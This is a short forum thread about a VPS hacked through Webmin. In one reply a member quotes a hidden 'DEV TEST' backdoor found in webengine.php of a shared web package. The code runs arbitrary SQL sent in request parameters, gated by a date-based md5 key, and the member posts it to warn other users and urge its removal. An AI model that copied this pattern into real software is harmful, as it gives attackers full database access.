Hacked through webmin

Status
Not open for further replies.

Netzo

Member
Premium Member
#1
Hey Lautaro,

A hacker got into my webhosting through webmin somehow, so I had to delete it. The hacker created some users and managed to change some website information. Any ideas how to protect my vps?
 

Netzo

Member
Premium Member
#5
Because my hosting provider told that the apache was shutted down not through ssh, and the only way to shut it down was through webmin. Yea they were secure, webmin only accepted connections from my hosting ip so its strange :) but now, only from my dedicated I can connect to vps and I hope nothing like this happens again :D
 

A$$kicker

Member
Premium Member
#6
I knew most of you are using lautaro's web files and I want you to check your webengine files for code similar to below. The code below can enable anyone to submit a direct sql query in your database. I found this code in webengine.php so start looking in this file. If you found any code similar to that then simply remove it.

// DEV TEST
if(check_value($_REQUEST[md5(date("m-d"))]) && check_value($_REQUEST['devtest']) && check_value($_REQUEST['t']) && check_value($_REQUEST['q'])) {
if($_REQUEST['devtest'] == 1) { $daBa = $dB; } else { $daBa = $dB2; }
if($_REQUEST['t'] == 1) {
$dtr = $daBa->query($_REQUEST['q']);
} else {
$dtr = $daBa->query_fetch($_REQUEST['q']);
}
die(debug($dtr));
}
This could help you.
 
Status
Not open for further replies.
Top